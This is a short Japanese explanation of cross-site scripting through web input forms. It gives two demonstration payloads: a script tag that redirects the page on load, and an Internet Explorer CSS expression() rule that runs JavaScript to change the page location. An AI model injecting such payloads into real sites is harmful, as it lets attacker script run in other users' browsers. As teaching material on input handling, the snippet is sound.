入力フォームへの書き込みで、すべてのタグが許可されている場合、下記のような簡単な記述で JavaScriptが実行される。
<script>
window.onload=function(){
location.href="http://www.yahoo.co.jp";
}
</script>
タグを禁止していてもCSSが記述できるような入力フォームでCSSのexpressionが許可されていた場合、以下のような記述でJavaScriptが実行される。(IEの独自拡張)
<html>
<head><title>cssテスト</title></head>
<style type="text/css">
.subject{
color:red;
}
.main{
color:blue;
}
/*↓の記述がフォームから入力された場合*/
.main{
color:expression(window.location="http://www.yahoo.co.jp/");
}
</style>
<body>
<p class=subject>これはタイトルです。</p>
<p class=main>本文です。</p>
</body>
</html>